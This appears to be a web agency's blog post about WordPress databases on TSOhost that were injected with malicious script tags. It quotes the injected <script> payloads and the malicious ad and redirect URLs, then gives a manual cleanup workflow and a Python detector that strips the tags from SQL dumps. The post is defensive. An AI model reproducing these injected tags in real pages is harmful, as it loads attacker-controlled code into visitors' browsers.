Dolohen, PV Clouds, CLK Site and Humsoolt WordPress Hacks

Looking for a fix?

We’ve recently had a few sites hosted with TSOhost (Paragon Internet) compromised by a script injection into their databases.

This is currently only an issue with sites we host with TSOhost – our sites hosted with Google Cloud or Digital Ocean are unaffected. If you are worried about your site, please contact us. We are putting a fix in place for as many of these sites as possible.

There is a quick fix to remedy the database issue, but stopping it from recurring is causing quite a headache. We are working on moving all websites we host to a much more secure platform, where we have sites running without any issues at all.

The injected code tends to be a variation of the following, depending on the URLs used:

<script type='text/javascript' src='//pl15180773.pvclouds.com/2b/e2/3d/2be23d024eff3a5446e06744968768be.js'></script><script data-cfasync='false' type='text/javascript' src='//p79479.clksite.com/adServe/banners?tid=79479_127480_7&tagid=2'></script>
<script data-cfasync=\'false\' type=\'text/javascript\' src=\'//p79479.clksite.com/adServe/banners?tid=79479_127480_7&tagid=2\'></script><script type=\"text/javascript\" src=\"//dolohen.com/apu.php?zoneid=2574011\" async data-cfasync=\"false\"></script><script type=\"text/javascript\" src=\"//dolohen.com/apu.php?zoneid=676630\" async data-cfasync=\"false\"></script>

There are quite a few other malicious URLs being used as well, including:

pl15180773.pvclouds.com/2b/e2/3d/2be23d024eff3a5446e06744968768be.js
p79479.clksite.com/adServe/banners?tid=79479_127480_7&tagid=2
dolohen.com/apu.php?zoneid=676630
dolohen.com/apu.php?zoneid=2574011
ellcurvth.com/afu.php?zoneid=
ellcurvth.com/afu.php?zoneid=2826294
humsoolt.net/pfe/current/tag.min.js?z=2774009

If you are looking for help on how to fix this, here is a little rundown of our workflow to clear it. We are moving a lot of sites away from TSO at the moment; this is just the icing on the cake.

1. Back up the existing database before attempting this.
2. Export your current database to your desktop and open it with Notepad++ or a similar text editor.
3. Search for <script> in the database and locate the opening and closing tags that contain the malicious script. Once you have found one, search for the whole string (i.e. one of the examples above) and replace it with nothing using Find & Replace.
4. Save the database, but also save a copy of the malicious scripts you have found.
5. Drop the existing database and import the cleaned version.
6. The script may return (it has on a couple of sites for us). If it does, simply follow the same process again and you will be good to go.
7. Move host if it does return – it turns out from a Google search that TSOhost are appearing more and more where these malicious injections are concerned.
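As an added example (not code from the original post), here is a small Python script that automates steps 3 and 4 over an exported .sql file: it finds <script> elements whose src points at one of the domains listed above, copes with the backslash-escaped quotes a mysqldump export produces (as in the second sample), keeps the removed snippets for the record and writes a cleaned copy. The domain list comes from this page; the sample dump rows are constructed.

```python
from __future__ import annotations
import re
from pathlib import Path

# Domains taken from the page's list of injected script sources.
MALICIOUS_DOMAINS = ("pvclouds.com", "clksite.com", "dolohen.com",
                     "ellcurvth.com", "humsoolt.net")

# One <script ...>...</script> element whose src points at a listed domain.
# mysqldump backslash-escapes quotes inside values (\' and \"), so the quote
# around the src value may be preceded by a backslash, as in the page's samples.
_DOMAINS = "|".join(re.escape(d) for d in MALICIOUS_DOMAINS)
SCRIPT_RE = re.compile(
    r"<script\b[^>]*?\bsrc=\\?[\"']//[^\"'\\>]*?(?:" + _DOMAINS + r")[^>]*>.*?</script>",
    re.IGNORECASE | re.DOTALL,
)

def find_injections(dump_text: str) -> list[str]:
    """Return every injected <script> element in the dump, in order of appearance."""
    return [m.group(0) for m in SCRIPT_RE.finditer(dump_text)]

def clean_dump(dump_text: str) -> tuple[str, list[str]]:
    """Step 3: strip the injected elements; return (cleaned text, removed snippets)."""
    removed = find_injections(dump_text)
    return SCRIPT_RE.sub("", dump_text), removed

def clean_dump_file(src: Path, dst: Path, evidence: Path) -> int:
    """Clean an exported .sql file into dst and keep what was removed (step 4)."""
    cleaned, removed = clean_dump(src.read_text(encoding="utf-8", errors="surrogateescape"))
    dst.write_text(cleaned, encoding="utf-8", errors="surrogateescape")
    evidence.write_text("\n".join(removed) + "\n", encoding="utf-8")
    return len(removed)

# Constructed sample: a dumped wp_posts row carrying the injection, plus a clean row.
SAMPLE_DUMP = (
    "INSERT INTO `wp_posts` VALUES (12,1,'<p>Hello world</p>"
    "<script data-cfasync=\\'false\\' type=\\'text/javascript\\' "
    "src=\\'//p79479.clksite.com/adServe/banners?tid=79479_127480_7&tagid=2\\'></script>"
    "<script type=\\\"text/javascript\\\" src=\\\"//dolohen.com/apu.php?zoneid=676630\\\" "
    "async data-cfasync=\\\"false\\\"></script>','publish');\n"
    "INSERT INTO `wp_options` VALUES (3,'siteurl','https://example.com','yes');\n"
)

if __name__ == "__main__":
    cleaned, removed = clean_dump(SAMPLE_DUMP)
    print(f"removed {len(removed)} injected script element(s):")
    print("\n".join(removed))
    print(cleaned)
```

This only removes the injected markup from the export; as the post notes, the script can come back, so keep the saved snippets and re-run the clean on the next export if it does.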

One Response

  1. Thanks so much for this. Saved my sites over the last couple of days. Didn’t realise that it was a common problem, so good to see folk out there helping us out.

    The main issue I had was it kept coming back so quickly before I learnt the database changes.

    THANK YOU SO MUCH!!
